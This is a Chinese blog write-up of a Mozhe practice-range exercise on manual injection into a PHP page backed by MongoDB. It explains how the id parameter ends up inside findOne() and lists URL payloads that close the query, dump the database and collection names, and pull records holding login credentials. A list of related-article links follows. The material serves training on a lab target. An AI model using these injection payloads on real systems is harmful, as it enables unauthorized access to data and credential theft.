2. 程式人生 > 其它 >SQL手工注入MongoDB資料庫

SQL手工注入MongoDB資料庫

阿新 發佈:2022-01-25

MongoDB語法跟其它資料庫有所區別
具體參考:https://www.runoob.com/mongodb/mongodb-query.html

環境

墨者靶場 SQL手工注入漏洞測試(MongoDB資料庫)

思路

題目程式碼給出了列名

如果語句這樣寫/new_list.php?id=1 order by 2

程式碼接收db.notice.findOne({'id':'1 order by 2'}); return data; 並沒有閉合,注入語句無法生效

想辦法閉合語句,檢視所有集合

注入語句

都是內建函式,注入語句改列名就行

構造簡單的連結測回顯:/new_list.php?id=1'}); return ({title:1,content:'2

爆庫: /new_list.php?id=1'}); return ({title:tojson(db),content:'1

爆表:/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()),content:'1

db.getCollectionNames()返回的是陣列,需要用tojson轉換為字串,並且mongodb函式區分大小寫


爆欄位:/new_list.php?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1

db.Authority_confidential是當前用的表,find函式用於查詢,0是第一條資料,墨者第二條資料才是登入密碼,故而把find()[0]改為find()[1]

相關推薦

SQL手工注入MongoDB資料庫

MongoDB語法跟其它資料庫有所區別 具體參考:https://www.runoob.com/mongodb/mongodb-query.html

WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元型 )

前言 目前鑽研SQLi注入,這是第二篇,靶場名即為標題,連結如下 https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

墨者學院-SQL手工注入漏洞測試(Oracle資料庫)

墨者學院-SQL手工注入漏洞測試(Oracle資料庫) 前言   靶場地址:https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe

SQL手工注入方法

 SQL手工注入漏洞測試(MySQL資料庫) 的靶場練習   流程與方法 注意:加粗部分給重點

墨者_SQL手工注入漏洞測試(Oracle資料庫)

靶場: https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe 背景介紹 安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境Apache+PHP+Oracle,PH

SQL注入之基礎知識及手工注入

前言 SQL注入是比較常見的網路攻擊方式之一,它不是利用作業系統的BUG來實現攻擊,而是針對程式設計師編寫時的疏忽,通過SQL語句,實現無賬號登入,甚至篡改資料庫

墨者學院-SQL過濾字元後手工注入漏洞測試(第3題)

墨者學院-SQL過濾字元後手工注入漏洞測試(第3題) 前言   一段時間沒做SQL注入的題目了,更一題SQL

結合手工注入編寫一個SQL盲註腳本——以SQLi-Labs less16為例

一、分析測試注入點 1、抓包,檢視響應資料包 2、先隨便輸入一個賬號密碼,再測試萬能密碼

簡單瞭解Mybatis如何實現SQL注入

這篇文章主要介紹了簡單瞭解Mybatis如何實現SQL注入,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

Win10 64位安裝MongoDB資料庫的詳細教程

選擇對應的系統並下載MongoDB https://www.mongodb.com/download-center/community 選擇作業系統對應的版本

Zabbix3.4監控mongodb資料庫狀態的方法

mongodb有db.serverStatus()命令,可以檢視mongodb的執行狀態,那麼zabbix就可以呼叫這個命令實現mongodb的監控。

mongodb資料庫入門學習筆記之下載、安裝、啟動、連線操作解析

本文例項講述了mongodb資料庫下載、安裝、啟動、連線操作。分享給大家供大家參考,具體如下:

mongodb資料庫入門之CURD簡單操作示例

本文例項講述了mongodb資料庫入門之CURD簡單操作。分享給大家供大家參考,具體如下:

python連線、操作mongodb資料庫的方法例項詳解

本文例項講述了python連線、操作mongodb資料庫的方法。分享給大家供大家參考,具體如下:

Python操作Mongodb資料庫的方法小結

本文例項講述了Python操作Mongodb資料庫的方法。分享給大家供大家參考,具體如下:

python3 實現爬取TOP500的音樂資訊並存儲到mongoDB資料庫

爬取TOP500的音樂資訊,包括排名情況、歌曲名、歌曲時間。 網頁版酷狗不能手動翻頁進行下一步的瀏覽,仔細觀察第一頁的URL:

淺析Python與Mongodb資料庫之間的操作方法

MongoDB 是目前最流行的 NoSQL 資料庫之一,使用的資料型別 BSON(類似 JSON)。 1. 安裝Mongodb和pymongo

mongodb資料庫基礎知識之連表查詢

前言 在做自己的專案時,因為剛開始接觸mongodb非關係型資料庫以及關係型資料庫的影響還是留在腦中,總會想著進行一個連表查詢,然後看官網和資料學習了下,還有那個查詢時使用正則來匹配,在這裡做個記錄

sql與各個nosql資料庫使用場景的講解

sql為主幹為什麼我這樣理解: 單從技術角度來說 關係型網格 充分的體現了現實事務

windows與mac安裝mongodb資料庫的方法步驟與注意事項

nosql資料庫 ——mongodb資料庫! Mongo DB 是目前在IT行業非常流行的一種非關係型資料庫(NoSql),其靈活的資料儲存方式備受當前IT從業人員的青睞。Mongo DB很好的實現了面向物件的思想(OO思想),在Mongo DB中每一條記